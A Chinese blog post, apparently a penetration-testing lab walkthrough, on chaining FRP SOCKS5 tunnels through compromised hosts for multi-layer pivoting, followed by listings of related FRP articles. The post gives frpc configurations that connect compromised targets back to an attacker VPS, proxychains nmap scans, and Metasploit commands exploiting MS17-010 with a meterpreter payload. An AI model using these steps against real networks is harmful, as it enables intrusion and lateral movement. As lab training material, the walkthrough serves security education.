FRP内网代理

已于 2023-07-23 23:27:37 修改
阅读量1.6k 收藏 3
点赞数
文章标签: 网络
于 2023-07-23 19:41:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51151498/article/details/131842416
版权

       FRP(Fast Reverse Proxy)是一种轻量级、高性能的反向代理工具,可用于内网穿透、安全访问和数据传输等场景。FRP由fatedier团队开发,采用Golang语言编写,支持跨平台部署和使用。FRP的原理是利用反向代理技术将公网请求转发至内网服务器上,并将内网服务器的响应再次转发至公网请求者。在实现内网穿透时,FRP能够将公网与内网之间的隔离突破,使得公网用户可以直接访问内网服务器上的资源,从而实现远程访问和管理。-- > 使用FRP实现内网穿透 - 知乎

操作环境准备:

一台vps(或者使用Kali模拟)

三台靶机模拟内网环境

第一台靶机:

操作系统:CentOS7_64          IP:192.168.1.4

信息收集
分析利用
主机信息收集

请参考这篇文章:

Socks代理_- Time的博客-CSDN博客

FRP建立Socks代理

1.上传FRP至kali

2. VPS启动FRPS(服务端)

cat frps.ini


[common]
server_port = 7000


./frps -c frps.ini     #启动FRPS

netstat -anlp | grep 1080   #查看frps代理端口

3.目标靶机一启动FRPC(客户端)

蚁剑上传FRPC,并启动

frpc授予可执行权限

chmod +x frpc


新建文件写入以下内容:daili.ini

 [common]
server_addr = 攻击机ip
server_port = 7000


[socks5]
type = tcp
plugin = socks5
remote_port = 1080


./frpc -c daili.ini   #启动frpc

4.vim /etc/proxychins4.conf  #修改代理文件

添加保存    socks5 127.0.0.1 1080

5.proxychins curl 192.168.22.129  #访问内网主机

第二台靶机:

靶机信息

靶机系统:Ubunti16.04_64       IP:192.168.22.129

1.主机信息扫描:

proxychains nmap -sT -Pn -p- -n -T4 192.168.22.129 

获得目标主机二的shell:请参考Socks代理_- Time的博客-CSDN博客

2.蚁剑连接shell

由于无法访问内网,蚁剑添加代理

 成功连接

3.探测主机信息

发现33网段主机

FRP建立第二层代理

由于攻击机无法访问第三台主机,所以需要建立第二层代理

1.首先,kali先退出刚才启动的frps服务端

2.重新启动服务端:./frps -c frps.ini

3.第一台靶机启动frpc

   蚁剑上传frpc文件  至靶机一

   新建frpc1.ini文件

内容如下:

server_addr #攻击机IP

[common]
server_addr = 192.168.1.134      
server_port = 7000


[socks5-1]
type = tcp
remote_port = 1080
plugin = socks5


[socks5-33]
type = tcp
local_ip = 127.0.0.1
local_port = 10080
remote_port = 10088

./frpc -c frpc1.ini  #启动frpc客户端

靶机一启动frps服务端

1.蚁剑上传文件frps

2.新建frps1.ini文件

内容如下:

[common]
bind_port = 7000

靶机二启动frpc客户端

./frpc -c frpc2.ini

1.蚁剑上传frpc文件

2.新建frpc2.ini文件

内容如下:

server_addr 为靶机二的IP

[common]
server_addr = 192.168.22.129
server_port = 7000


[socks5-2]
type = tcp
plugin = socks5
remote_port = 10080   #这个 端口号是 > 靶机一:frpc.ini文件中 local_port的端口:10080

第三台靶机:

靶机信息

靶机系统:Windows7_64      IP:192.168.33.33

信息收集:

proxychains nmap -sT -Pn -p- -n -T4 192.168.33.128

返回结果错误

排查一下

1.VPS:frps服务端掉线

重启:./frps -c frps.ini

2.靶机一重启frpc客户端,重启frps服务端

netstat -anlp | grep 7000   #查看frps端口

ps -elf | grep frpc   #查看进程

3.靶机二重启frpc客户端

再次扫描还是报错

Kali再次打开代理配置文件

vim /etc/proxychains4.conf

#将第一次写入的代理注释掉

重新写入:socks5 127.0.0.1 10088     #10088端口是:靶机一:frpc1.ini文件中的 remote_port = 10088

 再次扫描成功

proxychains nmap -sT -Pn -p- -n -T4 192.168.33.128

 其中开放端口有445

可以利用ms17-010漏洞攻击

use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set proxies socks5:192.168.1.134:10088
set rhosts 192.168.33.128

exploit

#获得sessions会话

至此获取全部shell

...

- Time
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Frp穿透——frps服务端部署
01-20
由于现在IPv4地址的短缺,在国内不可能每个设备都会分配到一个公IP,因此从公中访问自己的私有设备向来是一件难事儿。本次带大家了解一下frp穿透的服务端教学,让你也能够部署一个内穿透服务。 frp简介 通俗的说,frp是一个反向代理软件,它不仅轻量且功能很强大,可以使处于内或防火墙后的设备对外界提供服务,它支持HTTP、TCP、UDP等众多协议。本文使用的版本为v0.32.1做为演示教程。 frp程序文件地址:https://github.com/fatedier/frp/releases 服务器相关 服务器相关: 1.因为frp的原理是利用服务端(所准备的具有公IP的服务器)进
frp-0.39.1-linux-arm64.tar,frp穿透应用
09-30
FRP(Fast Reverse Proxy)是一种轻量级、高性能的反向代理工具,可用于内穿透、安全访问和数据传输等场景。FRP由fatedier团队开发,采用Golang语言编写,支持跨平台部署和使用。FRP的原理是利用反向代理技术将公请求转发至内服务器上,并将内服务器的响应再次转发至公请求者。在实现内穿透时,FRP能够将公与内之间的隔离突破,使得公用户可以直接访问内服务器上的资源,从而实现远程访问和管理。
frp穿透之(反向代理nginx)
最新发布
weixin_39255905的博客
04-02 1064
​ 如果没有报错,代表启动成功!云服务器,配置规则记得也要开放。​ 其中 frps.toml 文件就是我们服务端的配置文件,我们需要根据自己情况稍作修改。可以手动下载到本地,然后通过scp命令传到服务器,也可以直接在外服务器上下载。如果你使用的是windows系统,配置和启动方法一样。​ 其中作为服务端,我们只需要关注 frps 和 frps.toml 文件。​ 此时frp的服务端我们就配置完毕了,接下来开始配置客户端。​ 注意:配置项并未介绍完,详情请参见官方文档。​ 如控制台未报错,代表启动成功,
流量代理frp穿透工具包.zip
01-13
frp穿透的基础原理 现在来说frp项目的原理。这个项目分为两个部分,frps和frpc。S指server服务端的意思,c指client客户端的意思。服务端需要站在明处,所以frps我们把它部署在云服务器上,因为云服务器一班都是独立公ip,所以实际上只要任意一个有公ip的设备都可以用来部署frps,因为有公ip就等于站在明处。 frpc作为客户端一般部署在没有公ip的设备上,实际运营情况中,云服务器部署frps,nas部署客户端frpc,然后没有公ip的nas通过frp和站在明处的服务器建立了连接通道,以后其他设备无论你是在明处还是暗处,只要和站在明处的服务器通道通信,服务器就能做一个第三方帮你们牵手连接。用户访问有公ip的frps服务端,frps服务端再把请求转发给安装了frpc的客户端,最终就实现了任意用户访问没有公ip的设备。
frp穿透.md
01-14
frp 是一个可用于内穿透的高性能的反向代理应用,支持 tcp, udp 协议,为 http 和 https 应用协议提供了额外的能力,且尝试性支持了点对点穿透。 frp 仍然处于开发阶段,未经充分测试与验证,不推荐用于生产环境。 master 分支用于发布稳定版本,dev 分支用于开发,您可以尝试下载最新的 release 版本进行测试。 目前的交互协议可能随时改变,不保证向后兼容,升级新版本时需要注意公告说明同时升级服务端和客户端。 根据对应的操作系统及架构,从 Release 页面下载最新版本的程序。 将 frps 及 frps.ini 放到具有公 IP 的机器上。 将 frpc 及 frpc.ini 放到处于内环境的机器上。 通过 ssh 访问公司内机器 修改 frps.ini 文件,这里使用了最简化的配置: # frps.ini [common] bind_port = 7000 启动 frps: ./frps -c ./frps.ini 修改 frpc.ini 文件,假设 frps 所在服务器的公 IP 为 x.x.x.x; # frpc.ini [common] server_addr = x.x.x.x server_port = 7000 [ssh] type = tcp local_ip = 127.0.0.1 local_port = 22 remote_port = 6000
FRP反向代理
11-13
使用FRP可以轻松将内主机IP挂到外上,有用的资源放在内主机中,开通代理后通过代理端口轻松访问。FRP使用操作简单,时候入门使用
frp穿透 多系统 多模式(详细+多个应用)
ziqibit的博客
03-13 1万+
frp穿透的跨平台,多模式(包括点对点)的超详细教程,可直接复制使用
使用 frp穿透
qq1507171150的博客
06-09 3331
frp 服务器上,打开 frps.ini 配置文件并添加一个新的 [common] 配置项,并将remoteport设置为公共IP地址上的端口号,并将 localport 设置为您在 frpc.ini 中指定的本地服务端口号。首先需要下载并安装 frp 客户端,可以从 frp 官方站下载相应的客户端,根据您的操作系统选择合适的版本:https://github.com/fatedier/frp/releases。local_ip:内服务的IP地址,可以为 127.0.0.1 或真实内IP。
渗透 | FRP代理工具详解
mingyqf的博客
12-07 1万+
FRP工具的使用 FRP官方文档:https://gofrp.org/docs 一、FRP工具的介绍 1.为什么需要内穿透 我们的物理机、服务器可能处于路由器后或者处于内之中。如果我们想直接访问到这些设备(远程桌面、远程文件、SSH等等),一般来说要通过一些转发或者P2P(端到端)组软件的帮助。 其实,对于FRP穿透工具来说,它和端口转发有所不同,端口转发是只会进行单个端口的流量转发,但是这在渗透中往往是不行的,我们通过通过FRP进行内的全流量的数据代理,像FRP可以代理全端口、全流量的数据,这样我
frp穿透搭建
yuqie的博客
03-29 4229
从公中访问自己的私有设备向来都是一件难事。自己的台式机、NAS等等设备,它们可能处于路由器后,或者运营商因为IP地址短缺不给你分配公IP地址。果我们想直接访问这些设备(远程桌面、远程文件、SSH等等),一般来说要通过一些转发或者P2P组软件的帮助。
frp代理
weixin_43833725的博客
06-12 1495
frp穿透
windows本地与云端服务器进行SSH与frp穿透.pdf
08-25
什么是FRP frp 是一个专注于内穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议,且支持 P2P 通信。可以将内服务以安全、便捷的方式通过具有公 IP 节点的中转暴露到公,俗称端口转发 为什么使用 frp ? 通过在具有公 IP 的节点上部署 frp 服务端,可以轻松地将内服务穿透到公,同时提供诸多专业的功能特性,这包括: 客户端服务端通信支持 TCP、QUIC、KCP 以及 Websocket 等多种协议。 采用 TCP 连接流式复用,在单个连接间承载更多请求,节省连接建立时间,降低请求延迟。 代理组间的负载均衡。 端口复用,多个服务通过同一个服务端端口暴露。 支持 P2P 通信,流量不经过服务器中转,充分利用带宽资源。 多个原生支持的客户端插件(静态文件查看,HTTPS/HTTP 协议转换,HTTP、SOCK5 代理等),便于独立使用 frp 客户端完成某些工作。 高度扩展性的服务端插件系统,易于结合自身需求进行功能扩展。 服务端和客户端 UI 页面。
穿透FRP工具 windows 客户端和服务端 V0.46
03-02
frp 是什么?...frp 是一个专注于内穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内服务以安全、便捷的方式通过具有公 IP 节点的中转暴露到公。 帮助文档 ...
frp穿透工具-其他
06-11
frp是一个高性能的反向代理应用,可以帮助您轻松地进行内穿透,对外提供服务,支持tcp,http,https等协议类型,并且web服务支持根据域名进行路由转发。 frp的作用: 利用处于内或防火墙后的机器,对外环境...
免费FRP穿透客户端设置工具
12-26
FRP穿透客户端设置工具,提供免费FRP服务器,最多可以设置3个端口,外部端口范围13389-15000
frp代理工具
weixin_45682070的博客
12-05 2537
frps.ini的配置文件如下: [common] bind_port = 7000 [common]部分是必须有的配置,其中bind_port是自己设定的frp服务端端口,用于和frp服务器端进行通信。 frpc.ini配置文件如下: [common] server_addr = VPS IP server_port = 7000 [ssh] type = tcp local_ip = 127.0.0.1 local_port = 22 remote_port = 6000 [common]部分是
使用Frp进行反向代理实现远程桌面控制[teamviewer/nomachine]
李老板Holden的博客
06-20 2091
使用Frp进行反向代理实现远程桌面控制[teamviewer/nomachine]
frp(内穿透)深入篇-危害及深入应用(三)
weixin_45837366的博客
02-23 1万+
frp(内穿透)实操篇–内跳转(三) 这一篇内容是让你了解,认识内穿透除了能够映射本机还能干些什么。同时你也要深思内穿透会带来的危害。 我们先详细了解下代理的原理 大概的一个结构图。 我们内的服务器端的设备通过由内而外的跟公服务器上的frp服务器建立连接,类似于建立一个位置坐标,让外的服务器知道你在哪,并将它设置到服务器的某个端口上,使通过互联能以访问到你公ip的用户能够通过该端口在找到你内准确的位置,从而实现内穿透。 所有的数据都是通过走公服务器上,通过frps接受到内传出来的
使用frps和frpc实现内穿透
热门推荐
jiuweideqixu的博客
09-07 3万+
穿透的作用包括跨段访问一个局域中的一台主机。 如上图,假设我们想要通过主机A访问主机C,但是主机A和主机C绑定的都是私有ip地址,所以它们之间是无法直接进行通信的。要想使得A和C能够进行通信,就需要用到内穿透的技术。 我们可以借助frps(服务端)和frpc(客户端)来实现主机A对主机C的访问。 需要做的是: 1.在绑定了公ip的主机B中配置frps(服务端) 2.在主机C中配置frpc(客户端) frps/frpc的工具包的github地址是: https://github.
nginx frp穿透
10-18
nginx和frp都是常用的内穿透工具,但是它们的实现方式不同。nginx主要是通过反向代理实现内穿透,而frp则是通过将内服务映射到公上实现内穿透。下面我会分别介绍一下它们的实现方式。 nginx的内穿透实现方式: nginx可以通过反向代理实现内穿透,具体步骤如下: 1. 在公服务器上安装nginx,并配置好域名解析。 2. 在内服务器上安装需要穿透的服务,并配置好端口。 3. 在公服务器上配置nginx反向代理,将公域名指向内服务器的IP地址和端口。 4. 在公服务器上启动nginx服务,即可通过公域名访问内服务。 frp的内穿透实现方式: frp可以将内服务映射到公上,具体步骤如下: 1. 在公服务器上安装frp,并配置好域名解析。 2. 在内服务器上安装需要穿透的服务,并配置好端口。 3. 在公服务器上配置frp客户端,将内服务映射到公上。 4. 在公服务器上启动frp服务,即可通过公域名访问内服务。 相关问题: 1. nginx和frp的优缺点分别是什么? 2. 如何保证nginx和frp的安全性? 3. nginx和frp的配置文件有哪些需要注意的地方?

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值